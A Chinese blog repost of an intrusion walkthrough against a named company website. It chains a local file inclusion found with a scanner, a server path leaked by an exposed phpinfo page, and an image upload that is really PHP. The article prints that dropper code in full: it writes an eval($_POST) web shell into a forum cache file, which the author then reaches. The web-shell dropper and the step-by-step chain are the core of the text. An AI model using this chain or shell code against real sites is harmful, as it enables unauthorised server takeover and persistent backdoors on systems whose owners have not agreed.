我是靠谱客的博主 虚幻项链,最近开发中收集的这篇文章主要介绍文件包含漏洞对公司测试,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

主站是:www.xxxx.biz
环境:linux php nginx,伪静态的。
主站基本是没希望,不过xss很多,懒得去利用。
有公司有一个新新业务,所以开发部门建立了一个新的网站,所以我也就..........开始看了下dz 7.5的,自己修改了一些东西,尝试了公开的0DAY没戏,各种尝试无果。

最后丢到wvs里面一扫,一会就出来了一个本地包含漏洞,详细继续。

根据WVS扫描结果,漏洞发生在以下页面:
&id=17
这是一个很明显的本地文件包含漏洞
bendibaohan.png
但是这个漏洞使用相对路径来进行包含是不成功的,要使用绝对路径,在以下文件发现phpinfo信息
http://www.cntuike.net/info.php

发现网站绝对路径为
/data0/htdocs/www.dxg.com/view/

于是用WVS的HTTPEDITOR进行访问

3212323.jpg

图片1.png
此时你已经发现info.php已经被成功包含并执行了

接下来要构造你自己的webshell,通常情况下就是通过上传。在网站上发现了注册会员服务,注册一个账号之后,在用户中心的企业新闻里面新增一个新闻,然后上传一个内容是:


<?php
$fp = @fopen("/data0/htdocs/www.dxg.com/view/bbs/forumdata/cache/cache_1.php", 'a');
@fwrite($fp, '<'.'?php'."rnrn".'eval($_POST[chen]);'."rnrn?".">rn");
@fclose($fp);
?>

上传成功后可以看到是一个相对路径

图片2.png

/uploads/contentImg/news/201204/10/133404553855857.jpg

将两者合并起来
/data0/htdocs/www.dxg.com/view/uploads/contentImg/news/201204/10/133404553855857.jpg

于是再用WVS访问

3221.jpg

成功之后直接访问
http://www.cntuike.net/bbs/forumdata/cache/cache_1.php

图片3.jpg

3212323.jpg (12.07 KB)

 

3212323.jpg

 

转载于:https://www.cnblogs.com/mujj/articles/2781900.html

最后

以上就是虚幻项链为你收集整理的文件包含漏洞对公司测试的全部内容,希望文章能够帮你解决文件包含漏洞对公司测试所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(42)

评论列表共有 0 条评论

立即
投稿
返回
顶部